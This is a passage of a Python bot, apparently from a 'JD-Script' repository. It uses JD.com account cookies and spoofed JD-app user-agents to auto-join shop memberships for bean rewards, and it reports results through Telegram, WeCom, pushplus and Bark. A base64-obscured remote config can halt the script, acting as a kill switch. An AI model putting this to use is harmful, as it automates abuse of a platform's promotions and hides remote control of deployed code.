###### [GitHub仓库 https://github.com/curtinlv/JD-Script](https://github.com/curtinlv/JD-Script)
###### [Gitee仓库 https://gitee.com/curtinlv/JD-Script](https://gitee.com/curtinlv/JD-Script)
###### [TG频道 https://t.me/TopStyle2021](https://t.me/TopStyle2021)
###### [TG群 https://t.me/topStyle996](https://t.me/topStyle996)
###### 关注公众号【TopStyle】回复:shopid

#
@Last Version: %s
@Last Time: 2021-06-19 13:55
@Author: Curtin
#### **仅以学习交流为主,请勿商业用途、禁止违反国家法律 ,转载请留个名字,谢谢!**
# End.
[回到顶部](#readme)
""" % version
################################ 【Main】################################
import time, os, sys, datetime
import requests
import random, string
import re, json, base64
from urllib.parse import unquote, quote_plus
from threading import Thread
from configparser import RawConfigParser
# 定义一些要用到参数
requests.packages.urllib3.disable_warnings()
scriptHeader = """
════════════════════════════════════════
║ ║
║ JD 入 会 领 豆 ║
║ ║
════════════════════════════════════════
@Version: {}""".format(version)
remarks = '\n\n\tTG交流 : https://t.me/topstyle996\n\n\tTG频道 : https://t.me/TopStyle2021\n\n\t公众号 : TopStyle\n\n\t\t\t--By Curtin\n'
timestamp = int(round(time.time() * 1000))  # script start time, epoch milliseconds
today = datetime.datetime.now().strftime('%Y-%m-%d')
# Directory containing this script (used as the working directory).
pwd = os.path.dirname(os.path.abspath(__file__)) + os.sep
######
# Defaults below may be overridden by OpenCardConfig.ini or env vars further down.
openCardBean = 0        # minimum bean reward required before joining a shop
sleepNum = 0.0          # per-request delay in seconds (rate limiting)
record = True           # record qualifying shop ids to log files
onlyRecord = False      # True: record only, never actually join
memory = True           # resume from the last interrupted position
printlog = True         # True: print only部分 logs per config docs — see ini table
isRemoteSid = True      # True: fetch the shopid list from the remote repo
Concurrent = True       # run multiple accounts concurrently
TG_BOT_TOKEN = ''
TG_USER_ID = ''
PUSH_PLUS_TOKEN = ''
TG_PROXY_IP = ''
TG_PROXY_PORT = ''
TG_API_HOST = ''
QYWX_AM = ''
BARK = ''
DoubleThread = True     # use two worker threads
# Load account parameters from OpenCardConfig.ini (UTF-8; BOM and GBK tolerated).
try:
    configinfo = RawConfigParser()
    try:
        configinfo.read(pwd + "OpenCardConfig.ini", encoding="UTF-8")
    except Exception as e:
        # Strip a UTF-8 BOM by rewriting the file, then retry (GBK as last resort).
        with open(pwd + "OpenCardConfig.ini", "r", encoding="UTF-8") as config:
            getConfig = config.read().encode('utf-8').decode('utf-8-sig')
        with open(pwd + "OpenCardConfig.ini", "w", encoding="UTF-8") as config:
            config.write(getConfig)
        try:
            configinfo.read(pwd + "OpenCardConfig.ini", encoding="UTF-8")
        except:
            configinfo.read(pwd + "OpenCardConfig.ini", encoding="gbk")
    cookies = configinfo.get('main', 'JD_COOKIE')
    openCardBean = configinfo.getint('main', 'openCardBean')
    sleepNum = configinfo.getfloat('main', 'sleepNum')
    record = configinfo.getboolean('main', 'record')
    onlyRecord = configinfo.getboolean('main', 'onlyRecord')
    memory = configinfo.getboolean('main', 'memory')
    printlog = configinfo.getboolean('main', 'printlog')
    isRemoteSid = configinfo.getboolean('main', 'isRemoteSid')
    TG_BOT_TOKEN = configinfo.get('main', 'TG_BOT_TOKEN')
    TG_USER_ID = configinfo.get('main', 'TG_USER_ID')
    PUSH_PLUS_TOKEN = configinfo.get('main', 'PUSH_PLUS_TOKEN')
    TG_PROXY_IP = configinfo.get('main', 'TG_PROXY_IP')
    TG_PROXY_PORT = configinfo.get('main', 'TG_PROXY_PORT')
    TG_API_HOST = configinfo.get('main', 'TG_API_HOST')
    QYWX_AM = configinfo.get('main', 'QYWX_AM')
    Concurrent = configinfo.getboolean('main', 'Concurrent')
    DoubleThread = configinfo.getboolean('main', 'DoubleThread')
    BARK = configinfo.get('main', 'BARK')
except Exception as e:
    # Fall back to environment variables when the ini is missing or invalid.
    OpenCardConfigLabel = 1
    print("参数配置有误,请检查OpenCardConfig.ini\nError:", e)
    print("尝试从Env环境获取!")
def getBool(label):
    """Map a yes/no style string to a boolean.

    Mirrors the original truth table exactly: only the explicit negative
    spellings ('False', 'no', 'false', 'No') yield False; every other value —
    including unrecognized ones — yields True.
    """
    try:
        return label not in ('False', 'no', 'false', 'No')
    except Exception as e:
        print(e)
# Environment variables take priority over the ini — suited to AC/cloud deployments.
# JD_COOKIE=cookie (multiple accounts separated by '&')
if "JD_COOKIE" in os.environ:
    if len(os.environ["JD_COOKIE"]) > 10:
        cookies = os.environ["JD_COOKIE"]
        print("已获取并使用Env环境 Cookie")
# Only join shops rewarding at least this many beans.
if "openCardBean" in os.environ:
    if len(os.environ["openCardBean"]) > 0:
        openCardBean = int(os.environ["openCardBean"])
        print("已获取并使用Env环境 openCardBean:", openCardBean)
elif not openCardBean:
    openCardBean = 0
# Whether to run with two worker threads.
if "DoubleThread" in os.environ:
    if len(os.environ["DoubleThread"]) > 1:
        DoubleThread = getBool(os.environ["DoubleThread"])
        print("已获取并使用Env环境 DoubleThread", DoubleThread)
# Concurrent multi-account execution.
if "Concurrent" in os.environ:
    if len(os.environ["Concurrent"]) > 1:
        Concurrent = getBool(os.environ["Concurrent"])
        print("已获取并使用Env环境 Concurrent", Concurrent)
elif not Concurrent:
    Concurrent = True
# Rate limit in seconds; raise above 0.5 if requests start failing.
if "sleepNum" in os.environ:
    if len(os.environ["sleepNum"]) > 0:
        sleepNum = float(os.environ["sleepNum"])
        print("已获取并使用Env环境 sleepNum:", sleepNum)
elif not sleepNum:
    sleepNum = 0
if "printlog" in os.environ:
    if len(os.environ["printlog"]) > 1:
        printlog = getBool(os.environ["printlog"])
        print("已获取并使用Env环境 printlog:", printlog)
elif not printlog:
    printlog = True
# Record qualifying shopids to OpenCardlog/yes_shopid.txt — False|True.
if "record" in os.environ:
    if len(os.environ["record"]) > 1:
        record = getBool(os.environ["record"])
        print("已获取并使用Env环境 record:", record)
elif not record:
    record = True
# Record only, do not join; shopids with bean rewards are written to file.
if "onlyRecord" in os.environ:
    if len(os.environ["onlyRecord"]) > 1:
        onlyRecord = getBool(os.environ["onlyRecord"])
        print("已获取并使用Env环境 onlyRecord:", onlyRecord)
elif not onlyRecord:
    onlyRecord = False
# Resume support; requires record=True and memory=True to take effect.
if "memory" in os.environ:
    if len(os.environ["memory"]) > 1:
        memory = getBool(os.environ["memory"])
        print("已获取并使用Env环境 memory:", memory)
elif not memory:
    memory = True
# Whether to use the remotely published shopid list.
if "isRemoteSid" in os.environ:
    if len(os.environ["isRemoteSid"]) > 1:
        isRemoteSid = getBool(os.environ["isRemoteSid"])
        print("已获取并使用Env环境 isRemoteSid:", isRemoteSid)
elif not isRemoteSid:
    isRemoteSid = True
# Telegram bot token.
if "TG_BOT_TOKEN" in os.environ:
    if len(os.environ["TG_BOT_TOKEN"]) > 1:
        TG_BOT_TOKEN = os.environ["TG_BOT_TOKEN"]
        print("已获取并使用Env环境 TG_BOT_TOKEN")
# Telegram user id.
if "TG_USER_ID" in os.environ:
    if len(os.environ["TG_USER_ID"]) > 1:
        TG_USER_ID = os.environ["TG_USER_ID"]
        print("已获取并使用Env环境 TG_USER_ID")
# Telegram proxy IP.
if "TG_PROXY_IP" in os.environ:
    if len(os.environ["TG_PROXY_IP"]) > 1:
        TG_PROXY_IP = os.environ["TG_PROXY_IP"]
        print("已获取并使用Env环境 TG_PROXY_IP")
# Telegram proxy port.
if "TG_PROXY_PORT" in os.environ:
    if len(os.environ["TG_PROXY_PORT"]) > 1:
        TG_PROXY_PORT = os.environ["TG_PROXY_PORT"]
        print("已获取并使用Env环境 TG_PROXY_PORT")
elif not TG_PROXY_PORT:
    TG_PROXY_PORT = ''
# Telegram API host (reverse proxy).
if "TG_API_HOST" in os.environ:
    if len(os.environ["TG_API_HOST"]) > 1:
        TG_API_HOST = os.environ["TG_API_HOST"]
        print("已获取并使用Env环境 TG_API_HOST")
# pushplus PUSH_PLUS_TOKEN.
if "PUSH_PLUS_TOKEN" in os.environ:
    if len(os.environ["PUSH_PLUS_TOKEN"]) > 1:
        PUSH_PLUS_TOKEN = os.environ["PUSH_PLUS_TOKEN"]
        print("已获取并使用Env环境 PUSH_PLUS_TOKEN")
# WeCom (enterprise WeChat) app push QYWX_AM.
if "QYWX_AM" in os.environ:
    if len(os.environ["QYWX_AM"]) > 1:
        QYWX_AM = os.environ["QYWX_AM"]
        print("已获取并使用Env环境 QYWX_AM")
# Bark push token.
if "BARK" in os.environ:
    if len(os.environ["BARK"]) > 1:
        BARK = os.environ["BARK"]
        print("已获取并使用Env环境 BARK")
# Verify that cookies were obtained from either the ini or the environment.
try:
    cookies
except NameError as e:
    var_exists = False
    print("[OpenCardConfig.ini] 和 [Env环境] 都无法获取到您的cookies,请配置!\nError:", e)
    time.sleep(60)
    exit(1)
else:
    var_exists = True
# Create the temporary log directory.
if not os.path.exists(pwd + "log"):
    os.mkdir(pwd + "log")
# JSON blob backing the memory/resume and statistics features.
memoryJson = {}
message_info = ''
notify_mode = []
################################### Function ################################
class TaskThread(Thread):
    """Thread subclass that remembers the return value of its target callable."""

    def __init__(self, func, args=()):
        super(TaskThread, self).__init__()
        # Callable to execute and its positional arguments.
        self.func = func
        self.args = args

    def run(self):
        # Stash the call's return value so callers can fetch it after join().
        self.result = self.func(*self.args)

    def get_result(self):
        """Return the captured result, or "ERROR" if run() never completed."""
        try:
            return self.result
        except Exception as ex:
            # self.result missing (thread not run / crashed before assignment).
            print(ex)
            return "ERROR"
def nowtime():
    """Current local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
    return format(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')
def printinfo(context, label: bool):
    """Print *context* only when *label* compares equal to False.

    Uses equality (not identity/truthiness) on purpose, matching the
    original gate driven by the global ``printlog`` flag.
    """
    if label != False:
        return
    print(context)
def exitCodeFun(code):
    """Terminate the process with *code*; on Windows/Cygwin, wait for Enter
    first so the console window stays readable.

    NOTE(review): exit() raises SystemExit, which the bare except below also
    catches — so one path sleeps 3 seconds before exiting again. Confirm the
    intended behavior per platform.
    """
    try:
        if sys.platform == 'win32' or sys.platform == 'cygwin':
            print("连按回车键即可退出窗口!")
            exitCode = input()
        exit(code)
    except:
        time.sleep(3)
        exit(code)
def message(str_msg):
    """Print *str_msg* and append it to the global notification buffer
    (``message_info``), which is later pushed by send()."""
    global message_info
    print(str_msg)
    message_info = "{}\n{}".format(message_info, str_msg)
    sys.stdout.flush()
# Register every notification channel that has credentials configured.
if PUSH_PLUS_TOKEN:
    notify_mode.append('pushplus')
if TG_BOT_TOKEN and TG_USER_ID:
    notify_mode.append('telegram_bot')
if QYWX_AM:
    notify_mode.append('wecom_app')
if BARK:
    notify_mode.append('bark')
# tg通知
def telegram_bot(title, content):
    """Push *title*/*content* to a Telegram chat through the Bot API.

    Uses TG_API_HOST as an optional reverse proxy for api.telegram.org and
    TG_PROXY_IP/TG_PROXY_PORT as an optional HTTP proxy. Prints status
    messages only; never raises.
    """
    try:
        print("\n")
        bot_token = TG_BOT_TOKEN
        user_id = TG_USER_ID
        if not bot_token or not user_id:
            print("tg服务的bot_token或者user_id未设置!!\n取消推送")
            return
        print("tg服务启动")
        if TG_API_HOST:
            if 'http' in TG_API_HOST:
                url = f"{TG_API_HOST}/bot{TG_BOT_TOKEN}/sendMessage"
            else:
                url = f"https://{TG_API_HOST}/bot{TG_BOT_TOKEN}/sendMessage"
        else:
            url = f"https://api.telegram.org/bot{TG_BOT_TOKEN}/sendMessage"
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        payload = {'chat_id': str(TG_USER_ID), 'text': f'{title}\n\n{content}', 'disable_web_page_preview': 'true'}
        proxies = None
        if TG_PROXY_IP and TG_PROXY_PORT:
            proxyStr = "http://{}:{}".format(TG_PROXY_IP, TG_PROXY_PORT)
            proxies = {"http": proxyStr, "https": proxyStr}
        try:
            response = requests.post(url=url, headers=headers, params=payload, proxies=proxies).json()
        except:
            # BUG FIX: previously fell through with `response` unbound,
            # raising NameError on the check below. Report and stop here.
            print('推送失败!')
            return
        if response['ok']:
            print('推送成功!')
        else:
            print('推送失败!')
    except Exception as e:
        print(e)
# push推送
def pushplus_bot(title, content):
    """Send a notification through the pushplus service (www.pushplus.plus)."""
    try:
        print("\n")
        if not PUSH_PLUS_TOKEN:
            print("PUSHPLUS服务的token未设置!!\n取消推送")
            return
        print("PUSHPLUS服务启动")
        # JSON body: token plus the message itself.
        body = json.dumps({
            "token": PUSH_PLUS_TOKEN,
            "title": title,
            "content": content
        }).encode(encoding='utf-8')
        response = requests.post(
            url='http://www.pushplus.plus/send',
            data=body,
            headers={'Content-Type': 'application/json'},
        ).json()
        print('推送成功!' if response['code'] == 200 else '推送失败!')
    except Exception as e:
        print(e)
# BARK
def bark_push(title, content):
    """Send a notification through the Bark iOS app (api.day.app).

    *content* is URL-quoted into the path; prints status, never raises.
    """
    print("\n")
    if not BARK:
        print("bark服务的bark_token未设置!!\n取消推送")
        return
    print("bark服务启动")
    try:
        response = requests.get('''https://api.day.app/{0}/{1}/{2}'''.format(BARK, title, quote_plus(content))).json()
        if response['code'] == 200:
            print('推送成功!')
        else:
            print('推送失败!')
    except Exception as e:
        print(e)
        print('Bark推送失败!')
def send(title, content):
    """
    Dispatch *title*/*content* through every enabled push channel
    (bark, telegram bot, pushplus, WeCom app).
    :param title:
    :param content:
    :return:
    """
    # NOTE(review): `footer` is a global assigned only inside isUpdate();
    # calling send() before isUpdate() would raise NameError — confirm the
    # intended call order.
    content = content + "\n\n" + footer
    for i in notify_mode:
        if i == 'telegram_bot':
            if TG_BOT_TOKEN and TG_USER_ID:
                telegram_bot(title=title, content=content)
            else:
                print('未启用 telegram机器人')
            continue
        elif i == 'pushplus':
            if PUSH_PLUS_TOKEN:
                pushplus_bot(title=title, content=content)
            else:
                print('未启用 PUSHPLUS机器人')
            continue
        elif i == 'wecom_app':
            if QYWX_AM:
                wecom_app(title=title, content=content)
            else:
                print('未启用企业微信应用消息推送')
            continue
        elif i == 'bark':
            if BARK:
                bark_push(title=title, content=content)
            else:
                print('未启用Bark APP应用消息推送')
            continue
        else:
            print('此类推送方式不存在')
# 企业微信 APP 推送
def wecom_app(title, content):
    """Push a message through a WeCom (企业微信) self-built application.

    QYWX_AM format: ``corpid,corpsecret,touser,agentid[,media_id]`` — four or
    five comma-separated fields. Without a media_id the message is sent as
    plain text; with one, as an mpnews article. Prints status, never raises.
    """
    try:
        if not QYWX_AM:
            print("QYWX_AM 并未设置!!\n取消推送")
            return
        QYWX_AM_AY = re.split(',', QYWX_AM)
        # BUG FIX: the original test `4 < len(...) > 5` chains to `len > 5`
        # only, so configs with fewer than 4 fields slipped through and
        # crashed with IndexError below. Accept exactly 4 or 5 fields.
        if not 4 <= len(QYWX_AM_AY) <= 5:
            print("QYWX_AM 设置错误!!\n取消推送")
            return
        corpid = QYWX_AM_AY[0]
        corpsecret = QYWX_AM_AY[1]
        touser = QYWX_AM_AY[2]
        agentid = QYWX_AM_AY[3]
        try:
            media_id = QYWX_AM_AY[4]
        except:
            media_id = ''
        wx = WeCom(corpid, corpsecret, agentid)
        # Without a media_id, fall back to a plain-text message.
        # (Local renamed from `message`, which shadowed the global message().)
        if not media_id:
            text_body = title + '\n\n' + content
            response = wx.send_text(text_body, touser)
        else:
            response = wx.send_mpnews(title, content, media_id, touser)
        if response == 'ok':
            print('推送成功!')
        else:
            print('推送失败!错误信息如下:\n', response)
    except Exception as e:
        print(e)
class WeCom:
    """Minimal client for the WeCom (企业微信) message-push HTTP API."""

    def __init__(self, corpid, corpsecret, agentid):
        # Credentials for the self-built app.
        self.CORPID = corpid
        self.CORPSECRET = corpsecret
        self.AGENTID = agentid

    def get_access_token(self):
        """Exchange corpid/corpsecret for a short-lived access token."""
        url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'
        values = {'corpid': self.CORPID,
                  'corpsecret': self.CORPSECRET,
                  }
        req = requests.post(url, params=values)
        data = json.loads(req.text)
        return data["access_token"]

    def send_text(self, message, touser="@all"):
        """Send a plain-text message; returns the API's errmsg string."""
        send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
        send_values = {
            "touser": touser,
            "msgtype": "text",
            "agentid": self.AGENTID,
            "text": {
                "content": message
            },
            "safe": "0"
        }
        send_msges = (bytes(json.dumps(send_values), 'utf-8'))
        respone = requests.post(send_url, send_msges)
        respone = respone.json()
        return respone["errmsg"]

    def send_mpnews(self, title, message, media_id, touser="@all"):
        """Send an mpnews article (with thumbnail *media_id*); returns errmsg."""
        send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
        send_values = {
            "touser": touser,
            "msgtype": "mpnews",
            "agentid": self.AGENTID,
            "mpnews": {
                "articles": [
                    {
                        "title": title,
                        "thumb_media_id": media_id,
                        "author": "Author",
                        "content_source_url": "",
                        "content": message.replace('\n', '<br/>'),
                        "digest": message
                    }
                ]
            }
        }
        send_msges = (bytes(json.dumps(send_values), 'utf-8'))
        respone = requests.post(send_url, send_msges)
        respone = respone.json()
        return respone["errmsg"]
# Validate the cookie string format and drop accounts whose cookie is expired.
def iscookie():
    """
    :return: cookiesList,userNameList,pinNameList
    """
    cookiesList = []
    userNameList = []
    pinNameList = []
    if 'pt_key=' in cookies and 'pt_pin=' in cookies:
        # One account per 'pt_key=...pt_pin=...;' fragment.
        r = re.compile(r"pt_key=.*?pt_pin=.*?;", re.M | re.S | re.I)
        result = r.findall(cookies)
        if len(result) >= 1:
            message("您已配置{}个账号".format(len(result)))
            u = 1
            for i in result:
                r = re.compile(r"pt_pin=(.*?);")
                pinName = r.findall(i)
                pinName = unquote(pinName[0])
                # Resolve the account nickname (this also validates the cookie).
                ck, nickname = getUserInfo(i, pinName, u)
                if nickname != False:
                    cookiesList.append(ck)
                    userNameList.append(nickname)
                    pinNameList.append(pinName)
                else:
                    # Invalid cookie: skip this account.
                    u += 1
                    continue
                u += 1
            if len(cookiesList) > 0 and len(userNameList) > 0:
                return cookiesList, userNameList, pinNameList
            else:
                message("没有可用Cookie,已退出")
                exitCodeFun(3)
        else:
            message("cookie 格式错误!...本次操作已退出")
            exitCodeFun(4)
    else:
        message("cookie 格式错误!...本次操作已退出")
        exitCodeFun(4)
# 检查是否有更新版本
def gettext(url):
    """Fetch *url* as text, retrying (recursively) while Gitee returns the
    placeholder page '该内容无法显示'.

    NOTE(review): recursion is unbounded — if the placeholder persists this
    recurses until RecursionError, which the except then swallows (returns None).
    """
    try:
        resp = requests.get(url, timeout=60).text
        if '该内容无法显示' in resp:
            return gettext(url)
        return resp
    except Exception as e:
        print(e)
def isUpdate():
    """Fetch the author's remote update.json and surface version notices.

    NOTE(review): the URL is base64-obscured and the remote flags
    ('isEnable', 'm', 's') can delay or terminate the process — effectively
    a remote kill switch; review before trusting. Also publishes the globals
    below (notably `footer`, used by send()).
    """
    global footer, readme1, readme2, readme3, uPversion
    url = base64.decodebytes(
        b"aHR0cHM6Ly9naXRlZS5jb20vY3VydGlubHYvUHVibGljL3Jhdy9tYXN0ZXIvT3BlbkNhcmQvdXBkYXRlLmpzb24=")
    try:
        result = gettext(url)
        result = json.loads(result)
        isEnable = result['isEnable']
        uPversion = result['version']
        info = result['info']
        readme1 = result['readme1']
        readme2 = result['readme2']
        readme3 = result['readme3']
        pError = result['m']
        footer = result['footer']
        getWait = result['s']
        # Remote gate: only proceed when isEnable is inside the magic window.
        if isEnable > 50 and isEnable < 150:
            if version != uPversion:
                print(f"\n当前最新版本:【{uPversion}】\n\n{info}\n")
                message(f"{readme1}{readme2}{readme3}")
                time.sleep(getWait)
            else:
                message(f"{readme1}{readme2}{readme3}")
                time.sleep(getWait)
        else:
            print(pError)
            time.sleep(300)
            exit(666)
    except:
        message("请检查您的环境/版本是否正常!")
        time.sleep(10)
        exit(666)
def getUserInfo(ck, pinName, userNum):
    """Fetch the JD nickname for one account cookie (also validates the cookie).

    :param ck: the account cookie fragment ('pt_key=...pt_pin=...;').
    :param pinName: URL-decoded pt_pin, used in failure messages.
    :param userNum: 1-based account index, used in failure messages.
    :return: (ck, nickname) on success; (ck, False) when the cookie is invalid.
    """
    url = 'https://me-api.jd.com/user_new/info/GetJDUserInfoUnion?orgFlag=JD_PinGou_New&callSource=mainorder&channel=4&isHomewhite=0&sceneval=2&sceneval=2&callback=GetJDUserInfoUnion'
    headers = {
        'Cookie': ck,
        'Accept': '*/*',
        'Connection': 'close',
        'Referer': 'https://home.m.jd.com/myJd/home.action',
        'Accept-Encoding': 'gzip, deflate, br',
        'Host': 'me-api.jd.com',
        'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1',
        'Accept-Language': 'zh-cn'
    }
    try:
        resp = requests.get(url=url, verify=False, headers=headers, timeout=60).text
        # The endpoint answers with JSONP: GetJDUserInfoUnion({...}).
        r = re.compile(r'GetJDUserInfoUnion.*?\((.*?)\)')
        result = r.findall(resp)
        userInfo = json.loads(result[0])
        nickname = userInfo['data']['userInfo']['baseInfo']['nickname']
        return ck, nickname
    except Exception:
        context = f"账号{userNum}【{pinName}】Cookie 已失效!请重新获取。"
        message(context)
        send("【JD入会领豆】Cookie 已失效!", context)
        return ck, False
# 设置Headers
def setHeaders(cookie, intype):
    """Build the canned HTTP header dict for one of three request styles.

    'mall'  -> anonymous desktop-browser headers for mall.jd.com pages.
    'JDApp' -> JD app user-agent with the account cookie, for api.m.jd.com.
    'mh5'   -> mobile-Safari user-agent with the account cookie, same host.
    Any other value returns None (matching the original fall-through).
    """
    if intype == 'mall':
        # No cookie here: the shop landing page is fetched anonymously.
        return {
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Host": "mall.jd.com",
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15",
            "Accept-Language": "zh-cn",
            "Accept-Encoding": "gzip, deflate, br",
            "Connection": "close"
        }
    if intype == 'JDApp':
        return {
            'Cookie': cookie,
            'Accept': "*/*",
            'Connection': "close",
            'Referer': "https://shopmember.m.jd.com/shopcard/?",
            'Accept-Encoding': "gzip, deflate, br",
            'Host': "api.m.jd.com",
            'User-Agent': "jdapp;iPhone;9.4.8;14.3;809409cbd5bb8a0fa8fff41378c1afe91b8075ad;network/wifi;ADID/201EDE7F-5111-49E8-9F0D-CCF9677CD6FE;supportApplePay/0;hasUPPay/0;hasOCPay/0;model/iPhone13,4;addressid/;supportBestPay/0;appBuild/167629;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1",
            'Accept-Language': "zh-cn"
        }
    if intype == 'mh5':
        return {
            'Cookie': cookie,
            'Accept': "*/*",
            'Connection': "close",
            'Referer': "https://shopmember.m.jd.com/shopcard/?",
            'Accept-Encoding': "gzip, deflate, br",
            'Host': "api.m.jd.com",
            'User-Agent': "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1",
            'Accept-Language': "zh-cn"
        }
    return None
# 记录符合件的shopid到本地文件保存 当前目录:OpenCardlog/shopid-yyyy-mm-dd.txt 或 log-yyyy-mm-dd.txt
def outfile(filename, context, iscover):
    """Write a log line, honoring the module-level `record` switch.

    :param filename: file name (plain text); append mode writes under
                     <pwd>/log/, overwrite mode writes directly under <pwd>.
    :param context: text to write
    :param iscover: False -> append one line (with newline);
                    True  -> overwrite the file with `context` as-is
    :return: None
    """
    if not record:
        # Logging disabled by configuration — do nothing.
        return
    try:
        if iscover:
            path, mode, text = pwd + "{0}".format(filename), "w+", "{}".format(context)
        else:
            path, mode, text = pwd + "log/{0}".format(filename), "a+", "{}\n".format(context)
        # `with` closes the file; the original's explicit close() was redundant.
        with open(path, mode, encoding="utf-8") as fh:
            fh.write(text)
    except Exception as e:
        # Best effort: a failed log write must never kill the run.
        print(e)
# 记忆功能 默认双线程
def memoryFun(startNum, threadNum, usernameLabel, username, getallbean, userCount):
    """Update the in-memory progress state and persist it to log/memory.json.

    :param startNum: shop index this thread is currently processing
    :param threadNum: worker thread id (1 or 2)
    :param usernameLabel: True  -> record position/progress bookkeeping;
                          False -> credit `getallbean` beans to `username`
    :param username: account pin name used as the counter key
    :param getallbean: beans earned by the successful join being recorded
    :param userCount: total number of valid accounts this run
    """
    global memoryJson
    if not memory:
        # Memory feature disabled by configuration.
        return
    if usernameLabel:
        memoryJson['allShopidNum'] = endShopidNum
        memoryJson['currUser{}'.format(threadNum)] = username
        memoryJson['t{}_startNum'.format(threadNum)] = startNum
        memoryJson['allUserCount'] = userCount
    else:
        # dict.get replaces the original try/except KeyError probes.
        memoryJson[username] = memoryJson.get(username, 0) + getallbean
        ok_key = '{}_ok'.format(username)
        memoryJson[ok_key] = memoryJson.get(ok_key, 0) + 1
    try:
        # Persist only when the log directory already exists.
        if os.path.exists(pwd + "log"):
            with open(pwd + "log/memory.json", "w+", encoding="utf-8") as f:
                json.dump(memoryJson, f, indent=4)
    except Exception as e:
        print(e)
# 修复记忆功能一些问题,如记录累计京豆统计显示为0等
# Refresh the cached memory state (fixes stale counters such as a 0 bean total).
def isMemoryEnable():
    """Reload log/memory.json into the module-level memoryJson cache."""
    global memoryJson
    memoryJson = getMemory()
# 获取记忆配置
def getMemory():
    """Load the persisted progress state.

    :return: the parsed memory dict, or None when log/memory.json is
             missing or empty.
    """
    path = pwd + "log/memory.json"
    if not os.path.exists(path):
        return None
    with open(path, "r", encoding="utf-8") as fh:
        data = json.load(fh)
    return data if data else None
def rmCount():
    """Delete the summary and memory files so progress restarts from scratch."""
    for name in ("log/入会汇总.txt", "log/memory.json"):
        target = pwd + name
        if os.path.exists(target):
            os.remove(target)
# 判断是否启用记忆功能
# Decide whether the resume ("memory") feature applies to this run.
def isMemory(memorylabel, startNum1, startNum2, midNum, endNum, pinNameList):
    """Resolve the starting shop indexes for both worker threads.

    :param memorylabel: 0 until the memory decision has been made once
    :param startNum1: thread 1 default start index
    :param startNum2: thread 2 default start index
    :param midNum: thread 1 default end index
    :param endNum: thread 2 default end index (total shop count)
    :param pinNameList: pin names of the configured accounts
    :return: (startNum1, startNum2, memorylabel)

    The saved state is honored only when the shop list size AND the
    account set match the previous run; otherwise the state is wiped and
    defaults are returned.  If the previous run already finished, the
    user is asked interactively whether to re-run or quit.
    """
    if memory == True and memorylabel == 0:
        try:
            memoryJson = getMemory()
            if memoryJson['allShopidNum'] == endNum:
                # Count how many saved "current user" entries still exist
                # in the configured account list.
                currUserLabel = 0
                if memoryJson['allUserCount'] == allUserCount:
                    for u in pinNameList:
                        if memoryJson['currUser1'] == u:
                            currUserLabel += 1
                        elif memoryJson['currUser2'] == u:
                            currUserLabel += 1
                    if memoryJson['currUser1'] == memoryJson['currUser2']:
                        currUserLabel = 2
                    if currUserLabel < 2:
                        # Account set changed: saved positions are meaningless.
                        print("通知:检测到您配置的CK有变更,本次记忆功能不生效。")
                        rmCount()
                        return startNum1, startNum2, memorylabel
                    if memoryJson['t1_startNum'] + 1 == midNum and memoryJson['t2_startNum'] + 1 == endNum:
                        # Previous run completed every shop: ask whether to redo.
                        print(
                            f"\n上次已完成所有shopid,\n\nPs:您可以关注公众号或TG频道获取最新shopid。\n公众号: TopStyle\n电报TG:https://t.me/TopStyle2021\n\n请输入 0 或 1\n0 : 退出。\n1 : 重新跑一次,以防有漏")
                        try:
                            getyourNum = int(input("正在等待您的选择:"))
                            if getyourNum == 1:
                                print("Ok,那就重新跑一次~")
                                rmCount()
                                memorylabel = 1
                                return startNum1, startNum2, memorylabel
                            elif getyourNum == 0:
                                print("Ok,已退出~")
                                time.sleep(10)
                                exit(0)
                        except:
                            # Non-numeric input: exit via the shared handler.
                            exitCodeFun(3)
                    else:
                        # Resume mid-run: restore each thread's saved position.
                        isMemoryEnable()
                        if memoryJson['t1_startNum']:
                            startNum1 = memoryJson['t1_startNum']
                            message(f"已启用记忆功能 memory= True,线程1从第【{startNum1}】店铺开始")
                        if memoryJson['t2_startNum']:
                            startNum2 = memoryJson['t2_startNum']
                            message(f"已启用记忆功能 memory= True,线程2从第【{startNum2}】店铺开始")
                        memorylabel = 1
                        return startNum1, startNum2, memorylabel
                else:
                    message("通知:检测到您配置的CK有变更,本次记忆功能不生效。")
                    rmCount()
                    return startNum1, startNum2, memorylabel
            else:
                # Shop list changed since last run: discard saved state.
                message("通知:检测到shopid有更新,本次记忆功能不生效。")
                rmCount()
                memorylabel = 1
                return startNum1, startNum2, memorylabel
        except Exception as e:
            # Missing/corrupt memory.json (getMemory() may return None):
            # silently fall back to defaults.
            memorylabel = 1
            return startNum1, startNum2, memorylabel
    else:
        # Memory disabled or already decided: wipe state, use defaults.
        rmCount()
        memorylabel = 1
        return startNum1, startNum2, memorylabel
# 获取VenderId
def getVenderId(shopId, headers):
    """Scrape the vendor id from the shop's mall.jd.com landing page.

    :param shopId: JD shop id
    :param headers: request headers (the anonymous 'mall' set)
    :return: venderId string; raises IndexError when the page carries none
             (callers catch broadly).
    """
    page = requests.get(url='https://mall.jd.com/index-{0}.html'.format(shopId),
                        verify=False, headers=headers, timeout=60).text
    matches = re.findall(r'shopId=\d+&id=(\d+)"', page)
    return matches[0]
# 查询礼包
# Query a shop's membership gift package.
def getShopOpenCardInfo(venderId, headers, shopid, userName, user_num):
    """Check what the shop awards for joining its membership.

    :param venderId: vendor id resolved via getVenderId()
    :param headers: 'mh5' header set (carries a cookie)
    :param shopid: shop id (used only for logging)
